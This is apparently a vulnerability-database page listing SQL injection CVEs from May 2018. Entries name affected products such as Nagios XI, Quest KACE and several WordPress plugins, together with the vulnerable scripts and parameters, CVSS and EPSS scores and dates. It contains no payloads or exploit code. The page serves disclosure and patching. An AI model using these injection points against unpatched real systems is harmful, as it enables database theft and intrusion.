Security Vulnerabilities, CVEs, Published In May 2018 (Sql injection)
An issue was discovered in SITEMAKIN SLAC (Site Login and Access Control) v1.0. The parameter "my_item_search" in users.php is exploitable using SQL injection.
Max CVSS
9.8
EPSS Score
0.46%
Published
2018-05-29
Updated
2018-06-29
WUZHI CMS 4.1.0 has SQL Injection via an api/sms_check.php?param= URI.
Max CVSS
9.8
EPSS Score
0.21%
Published
2018-05-29
Updated
2018-06-28
The wpForo plugin through 2018-02-05 for WordPress has SQL Injection via a search with the /forum/ wpfo parameter.
Max CVSS
9.8
EPSS Score
0.35%
Published
2018-05-28
Updated
2018-06-28
iScripts eSwap v2.4 has SQL injection via the "search.php" 'Told' parameter in the User Panel.
Max CVSS
8.8
EPSS Score
0.07%
Published
2018-05-25
Updated
2018-06-27
A SQL Injection issue was observed in the parameter "q" in jobcard-ongoing.php in EasyService Billing 1.0.
Max CVSS
9.8
EPSS Score
0.76%
Published
2018-05-25
Updated
2018-06-27
An issue was discovered in BearAdmin 0.5. There is admin/admin_log/index.html?user_id= SQL injection because admin\controller\AdminLog.php constructs a MySQL query improperly.
Max CVSS
8.8
EPSS Score
0.09%
Published
2018-05-24
Updated
2018-06-25
iScripts eSwap v2.4 has SQL injection via the "salelistdetailed.php" User Panel ToId parameter.
Max CVSS
9.8
EPSS Score
0.15%
Published
2018-05-22
Updated
2018-06-25
iScripts eSwap v2.4 has SQL injection via the wishlistdetailed.php User Panel ToId parameter.
Max CVSS
9.8
EPSS Score
0.15%
Published
2018-05-22
Updated
2018-06-25
An issue was discovered in PbootCMS v1.0.9. There is a SQL Injection that can get important information from the database via the \apps\home\controller\ParserController.php scode parameter.
Max CVSS
9.8
EPSS Score
0.15%
Published
2018-05-22
Updated
2018-06-22
Blind SQL injection in coupon_code in the MemberMouse plugin 2.2.8 and prior for WordPress allows an unauthenticated attacker to dump the WordPress MySQL database via an applyCoupon action in an admin-ajax.php request.
Max CVSS
9.8
EPSS Score
0.20%
Published
2018-05-28
Updated
2018-06-28
In the Divido plugin for OpenCart, there is SQL injection. Attackers can use SQL injection to get some confidential information.
Max CVSS
8.1
EPSS Score
0.90%
Published
2018-05-23
Updated
2018-06-26
The 'reportID' parameter received by the '/common/run_report.php' script in the Quest KACE System Management Appliance 8.0.318 is not sanitized, leading to SQL injection (in particular, an error-based type).
Max CVSS
9.8
EPSS Score
0.22%
Published
2018-05-31
Updated
2018-07-02
The 'orgID' parameter received by the '/common/download_agent_installer.php' script in the Quest KACE System Management Appliance 8.0.318 is not sanitized, leading to SQL injection (in particular, a blind time-based type).
Max CVSS
9.8
EPSS Score
0.22%
Published
2018-05-31
Updated
2018-06-29
PHPRAP 1.0.4 through 1.0.8 has SQL Injection via the application/home/controller/project.php search() function.
Max CVSS
9.8
EPSS Score
0.15%
Published
2018-05-14
Updated
2018-06-19
PHP remote file inclusion vulnerability in public/patch/patch.php in Project Pier 0.8.8 and earlier allows remote attackers to execute arbitrary commands or SQL statements via the id parameter.
Max CVSS
9.8
EPSS Score
37.14%
Published
2018-05-16
Updated
2020-05-06
CSP MySQL User Manager 2.3.1 allows SQL injection, and resultant Authentication Bypass, via a crafted username during a login attempt.
Max CVSS
9.8
EPSS Score
0.34%
Published
2018-05-05
Updated
2018-06-12
A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter.
Max CVSS
7.2
EPSS Score
1.86%
Published
2018-05-16
Updated
2018-06-15
A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/logbook.php txtSearch parameter.
Max CVSS
7.2
EPSS Score
1.86%
Published
2018-05-16
Updated
2018-06-15
A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/info.php key1 parameter.
Max CVSS
7.2
EPSS Score
1.86%
Published
2018-05-16
Updated
2018-06-15
A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/commandline.php cname parameter.
Max CVSS
7.2
EPSS Score
1.86%
Published
2018-05-16
Updated
2018-06-15
A vulnerability in ReadA version 1.1.0.2 and previous allows an authorized user with access to a privileged account on a BD Kiestra system (Kiestra TLA, Kiestra WCA, and InoqulA+ specimen processor) to issue SQL commands, which may result in loss or corruption of data.
Max CVSS
6.3
EPSS Score
0.04%
Published
2018-05-24
Updated
2019-10-09
A vulnerability in DB Manager version 3.0.1.0 and previous and PerformA version 3.0.0.0 and previous allows an authorized user with access to a privileged account on a BD Kiestra system (Kiestra TLA, Kiestra WCA, and InoqulA+ specimen processor) to issue SQL commands, which may result in data corruption.
Max CVSS
5.6
EPSS Score
0.04%
Published
2018-05-24
Updated
2019-10-09
Zoho ManageEngine ADAudit Plus before 5.0.0 build 5100 allows blind SQL Injection.
Max CVSS
9.8
EPSS Score
0.35%
Published
2018-05-29
Updated
2018-07-13
A SQL injection remote code execution vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to execute arbitrary SQL statements on vulnerable installations due to a flaw in the formRequestDomains class. Authentication is required to exploit this vulnerability.
Max CVSS
9.0
EPSS Score
0.67%
Published
2018-05-23
Updated
2018-06-22
A SQL injection information disclosure vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow a remote attacker to disclose sensitive information on vulnerable installations due to a flaw in the formChangePass class. Authentication is required to exploit this vulnerability.
Max CVSS
6.5
EPSS Score
0.08%
Published
2018-05-23
Updated
2018-06-22